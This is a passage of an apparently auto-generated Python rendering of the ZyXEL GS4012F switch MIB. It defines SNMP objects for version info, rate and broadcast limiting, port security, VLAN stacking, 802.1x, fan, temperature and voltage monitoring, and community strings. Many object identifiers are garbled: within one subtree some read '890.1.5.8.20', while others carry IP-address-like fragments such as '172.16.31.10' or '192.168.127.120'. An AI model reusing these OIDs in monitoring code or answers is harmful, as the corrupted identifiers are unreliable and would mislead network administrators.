"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation day, e.g. 19.""",
}, # scalar
"sysSwMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation month, e.g. 8.""",
}, # scalar
"sysSwYear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation year, e.g. 2004.""",
}, # scalar
"sysHwMajorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""HW major version number, e.g. 1.""",
}, # scalar
"sysHwMinorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""HW minor version number, e.g. 0.""",
}, # scalar
"sysSerialNumber" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""Serial number""",
}, # scalar
"rateLimitSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2",
}, # node
"rateLimitState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress/egress rate limiting enabled/disabled for the switch.""",
}, # scalar
"rateLimitPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"rateLimitPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in rateLimitPortTable.""",
}, # row
"rateLimitPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress/egress rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortCommitRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Commit rate in Kbit/s. The range of FE port is between 0 and 100,000. For GE port, the range is between 0 and 1000,000.""",
}, # column
"rateLimitPortPeakRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Peak rate in Kbit/s. The range of FE port is between 1 and 100,000. For GE port, the range is between 1 and 1000,000.""",
}, # column
"rateLimitPortEgrRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Egress rate in Mbit/s. The granularity of FE port is between 1 and 100. For GE port, the granularity is between 1 and 1000.""",
}, # column
"rateLimitPortPeakState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress peak rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortEgrState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Egress rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortCommitState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress commit rate limiting enabled/disabled on the port.""",
}, # column
"brLimitSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3",
}, # node
"brLimitState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Broadcast/multicast/DLF rate limiting enabled/disabled for the switch.""",
}, # scalar
"brLimitPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.3.2",
"status" : "current",
"description" :
"""""",
}, # table
"brLimitPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in brLimitPortTable.""",
}, # row
"brLimitPortBrState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Broadcast rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortBrRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed broadcast rate in pkts/s. For FE port,
the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"brLimitPortMcState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Multicast rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortMcRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""AAllowed mullticast rate in pkts/s. For FE port,
the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"brLimitPortDlfState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Destination lookup failure frames rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortDlfRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed destination lookup failure frames rate in pkts/s.
For FE port, the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"portSecuritySetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4",
}, # node
"portSecurityState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.4.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"portSecurityPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2",
"status" : "current",
"description" :
"""""",
}, # table
"portSecurityPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portSecurityPortTable.""",
}, # row
"portSecurityPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Port Security enabled/disabled on the port.
Active(1) means this port only accept frames from static MAC addresses that are configured for the port,
and dynamic MAC address frames up to the number specified by portSecurityPortCount object.""",
}, # column
"portSecurityPortLearnState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""MAC address learning enabled/disable on the port.""",
}, # column
"portSecurityPortCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Number of (dynamic) MAC addresses that may be learned on the port.""",
}, # column
"portSecurityMacFreeze" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"vlanTrunkSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5",
}, # node
"vlanTrunkPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1",
"status" : "current",
"description" :
"""""",
}, # table
"vlanTrunkPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in vlanTrunkPortTable.""",
}, # row
"vlanTrunkPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""VlanTrunking enabled/disabled on the port.
Active(1) to allow frames belonging to unknown
VLAN groups to pass through the switch.""",
}, # column
"ctlProtTransSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6",
}, # node
"ctlProtTransState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Bridge control protocol transparency enabled/disabled for the switch""",
}, # scalar
"ctlProtTransTunnelPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6.2",
"status" : "current",
"description" :
"""""",
}, # table
"ctlProtTransTunnelPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.6.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in ctlProtTransTunnelPortTable.""",
}, # row
"ctlProtTransTunnelMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.6.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"peer" : {
"nodetype" : "namednumber",
"number" : "0"
},
"tunnel" : {
"nodetype" : "namednumber",
"number" : "1"
},
"discard" : {
"nodetype" : "namednumber",
"number" : "2"
},
"network" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Bridge control protocol transparency mode for the port.
Modes: Peer(0), Tunnel(1), Discard(2), Network(3)""",
}, # column
"vlanStackSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7",
}, # node
"vlanStackState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.172.16.58.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""VLAN Stacking enabled/disabled for the switch.""",
}, # scalar
"vlanStackTpid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""SP TPID in hex format, e.g. 8100.""",
}, # scalar
"vlanStackPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3",
"status" : "current",
"description" :
"""""",
}, # table
"vlanStackPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in vlanStackPortTable.""",
}, # row
"vlanStackPortMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"normal" : {
"nodetype" : "namednumber",
"number" : "1"
},
"access" : {
"nodetype" : "namednumber",
"number" : "2"
},
"tunnel" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Mode of the port.Set Access mode to have the switch add the SP TPID tag to all incoming
frames received on this port. Set Access mode for ingress ports at the
edge of the service provider's network. Set Tunnel mode (available for
Gigabit ports only) for egress ports at the edge of the service provider's
network. In order to support VLAN stacking on a port, the port must be able
to allow frames of 1526 Bytes (1522 Bytes + 4 Bytes for the second tag)
to pass through it. Access (0), tunnel (1)""",
}, # column
"vlanStackPortVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.7.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""VLAN ID used in service provider tag.""",
}, # column
"vlanStackPortPrio" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.7.3.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"prioriry-0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"prioriry-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"prioriry-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"prioriry-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"prioriry-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"prioriry-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"prioriry-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"prioriry-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""Priority value for service provider tag.
0 is the lowest priority level and 7 is the highest.""",
}, # column
"dot1xSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.8",
}, # node
"portAuthState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.8.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port authentication enabled/disabled for the switch.""",
}, # scalar
"portAuthTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4",
"status" : "current",
"description" :
"""""",
}, # table
"portAuthEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portAuthTable.""",
}, # row
"portAuthEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.8.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port authentication enabled or disabled on the port.""",
}, # column
"portReAuthEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port re-authentication enabled or disabled on the port.""",
}, # column
"portReAuthEntryTimer" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.8.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Re-authentication timer in seconds.""",
}, # column
"hwMonitorInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9",
}, # node
"fanRpmTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1",
"status" : "current",
"description" :
"""""",
}, # table
"fanRpmEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1",
"status" : "current",
"linkage" : [
"fanRpmIndex",
],
"description" :
"""An entry in fanRpmTable.""",
}, # row
"fanRpmIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of FAN.""",
}, # column
"fanRpmCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Current speed in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmMaxValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Maximum speed measured in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Minimum speed measured in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmLowThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum speed at which a normal fan should work.""",
}, # column
"fanRpmDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates that this fan is functioning above the minimum speed.
'Error' indicates that this fan is functioning below the minimum speed.""",
}, # column
"tempTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2",
"status" : "current",
"description" :
"""""",
}, # table
"tempEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.2.1",
"status" : "current",
"linkage" : [
"tempIndex",
],
"description" :
"""An entry in tempTable.""",
}, # row
"tempIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"mac" : {
"nodetype" : "namednumber",
"number" : "1"
},
"cpu" : {
"nodetype" : "namednumber",
"number" : "2"
},
"phy" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""Index of temperature unit. 1:MAC, 2:CPU, 3:PHY""",
}, # column
"tempCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The current temperature measured at this sensor.""",
}, # column
"tempMaxValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum temperature measured at this sensor.""",
}, # column
"tempMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum temperature measured at this sensor.""",
}, # column
"tempHighThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The upper temperature limit at this sensor.""",
}, # column
"tempDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates temperatures below the threshold and 'Error' for those above.""",
}, # column
"voltageTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.3",
"status" : "current",
"description" :
"""""",
}, # table
"voltageEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1",
"status" : "current",
"linkage" : [
"voltageIndex",
],
"description" :
"""An entry in voltageTable.""",
}, # row
"voltageIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of voltage.""",
}, # column
"voltageCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The current voltage reading.""",
}, # column
"voltageMaxValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum voltage measured at this point.""",
}, # column
"voltageMinValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum voltage measured at this point.""",
}, # column
"voltageNominalValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.3.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The normal voltage at wchich the switch work.""",
}, # column
"voltageLowThresh" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The minimum voltage at which the switch should work.""",
}, # column
"voltageDescr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.9.3.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""'Normal' indicates that the voltage is within an acceptable operating range
at this point; otherwise 'Error' is displayed.""",
}, # column
"snmpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10",
}, # node
"snmpGetCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpSetCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpTrapCommunity" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"snmpTrapDestTable" : {
"nodetype" : "table",
